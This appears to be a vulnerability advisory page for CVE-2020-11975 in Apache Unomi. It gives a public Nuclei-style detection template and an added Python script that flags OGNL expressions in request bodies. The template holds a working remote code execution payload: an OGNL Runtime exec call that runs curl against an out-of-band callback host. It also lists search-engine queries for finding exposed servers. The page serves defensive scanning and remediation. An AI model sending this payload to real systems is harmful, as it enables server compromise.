CVE-2020-11975: Apache Unomi - Remote Code Execution

Date: 2025-08-01 | Affected software: Apache Unomi | PoC: public

Vulnerability description

Apache Unomi allows conditions to use OGNL scripting, which makes it possible to call static Java classes from the JDK and so run code with the permission level of the running Java process, enabling attackers to execute arbitrary code.

PoC code [public]

id: CVE-2020-11975

info:
  name: Apache Unomi - Remote Code Execution
  author: Sourabh-Sahu
  severity: critical
  description: |
    Apache Unomi allows conditions to use OGNL scripting which offers the possibility to call static Java classes from the JDK that could execute code with the permission level of the running Java process, enabling attackers to execute arbitrary code.
  impact: |
    Successful exploitation allows an attacker to execute arbitrary code on the server with the privileges of the Java process, potentially leading to complete system compromise.
  remediation: |
    Update Apache Unomi to version 1.5.2 or later. Disable OGNL scripting in conditions if not required.
  reference:
    - https://xz.aliyun.com/news/8157
    - https://github.com/1135/unomi_exploit
    - https://unomi.apache.org/security/cve-2020-11975.html
    - https://nvd.nist.gov/vuln/detail/CVE-2020-11975
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-11975
    cwe-id: CWE-94
    epss-score: 0.8271
    epss-percentile: 0.99197
    cpe: cpe:2.3:a:apache:unomi:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: apache
    product: unomi
    shodan-query: http.title:"Apache Unomi"
    fofa-query: title="Apache Unomi"
  tags: cve,cve2020,apache,unomi,rce,ognl,oast

http:
  - method: POST
    path:
      - "{{BaseURL}}/context.json"
    headers:
      Content-Type: application/json
    body: |
      {
        "personalizations":[
          {
            "id":"gender-test_anystr",
            "strategy":"matching-first",
            "strategyOptions":{
              "fallback":"var2"
            },
            "contents":[
              {
                "filters":[
                  {
                    "condition":{
                      "parameterValues":{
                        "propertyName":"(#r=@java.lang.Runtime@getRuntime()).(#r.exec(\"curl {{interactsh-url}}\"))",
                        "comparisonOperator":"equals_anystr",
                        "propertyValue":"male_anystr"
                      },
                      "type":"profilePropertyCondition"
                    }
                  }
                ]
              }
            ]
          }
        ],
        "sessionId":"test-demo-session-id"
      }

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"

      - type: dsl
        dsl:
          - 'contains_all(body, "profileId\":", "sessionId\":")'
          - 'contains(content_type, "application/json")'
          - 'status_code == 200 || status_code == 500'
        condition: and
# digest: 4a0a00473045022079c27bd0e9ef240eff67ee13b77b699ca3d5023e5f9818ad71927ebde6c67e460221009089da1bf5778468c385cc39e0d6919d5046fdbecff29caebbc2b9ea6bfee62b:922c64590222798bb761d5b6d8e72950
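As an added defensive example (not part of this page, the template, or Apache Unomi's own code), the Python script below inspects a /context.json request body of the shape used by the template above and flags any condition whose propertyName is an OGNL expression rather than a plain dotted property path. The JSON field names follow the request shown above; the allowed-name pattern and the OGNL marker characters are assumptions, and both sample bodies are constructed for the demo.

```python
"""Flag OGNL-style expressions in Apache Unomi /context.json condition
parameters. Added defensive example; the allowed propertyName pattern and
marker list are assumptions, not Unomi's own validation."""
import json
import re
from typing import Any, Iterator

# Assumption: a legitimate propertyName is a dotted identifier path such as
# "properties.gender" or "systemProperties.lastVisit".
SAFE_PROPERTY_NAME = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*(\.[A-Za-z_][A-Za-z0-9_]*)*$")

# Characters that never belong in a property path but are the building blocks
# of an OGNL expression: static access (@), variables (#), calls and assignment.
OGNL_MARKERS = ("@", "#", "(", ")", "=")


def _walk(node: Any, path: str = "$") -> Iterator[tuple[str, dict]]:
    """Yield (json_path, parameterValues) for every object carrying that map."""
    if isinstance(node, dict):
        if isinstance(node.get("parameterValues"), dict):
            yield path, node["parameterValues"]
        for key, value in node.items():
            yield from _walk(value, f"{path}.{key}")
    elif isinstance(node, list):
        for i, item in enumerate(node):
            yield from _walk(item, f"{path}[{i}]")


def find_ognl_in_conditions(body: str) -> list[dict]:
    """Return one finding per suspicious propertyName in a context.json body.

    A finding is raised when the value contains an OGNL marker or is not a
    plain dotted path; a body that is not valid JSON yields a single finding.
    """
    try:
        doc = json.loads(body)
    except json.JSONDecodeError as exc:
        return [{"path": "$", "reason": f"invalid json: {exc.msg}"}]
    findings = []
    for path, params in _walk(doc):
        name = params.get("propertyName")
        if not isinstance(name, str):
            continue
        markers = [m for m in OGNL_MARKERS if m in name]
        if markers or not SAFE_PROPERTY_NAME.match(name):
            findings.append({"path": f"{path}.parameterValues.propertyName",
                             "value": name, "markers": markers})
    return findings


def _body(property_name: str) -> str:
    """Build a constructed context.json body with one profilePropertyCondition."""
    return json.dumps({
        "sessionId": "sample-session",
        "personalizations": [{
            "id": "gender-test", "strategy": "matching-first",
            "contents": [{"filters": [{"condition": {
                "type": "profilePropertyCondition",
                "parameterValues": {"propertyName": property_name,
                                    "comparisonOperator": "equals",
                                    "propertyValue": "male"}}}]}]}],
    })


# Constructed samples: an ordinary lookup and an OGNL static-call expression.
BENIGN_BODY = _body("properties.gender")
SUSPICIOUS_BODY = _body("(#p=@java.lang.System@getProperty('java.version')).(#p)")

if __name__ == "__main__":
    for label, body in (("benign", BENIGN_BODY), ("suspicious", SUSPICIOUS_BODY)):
        print(label, find_ognl_in_conditions(body))
```

The same walk can be run inside a reverse proxy or a request-logging pipeline in front of Unomi; because it keys on the parameterValues map rather than on a fixed nesting depth, it also covers conditions placed elsewhere in the document than the personalization filter shown above.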
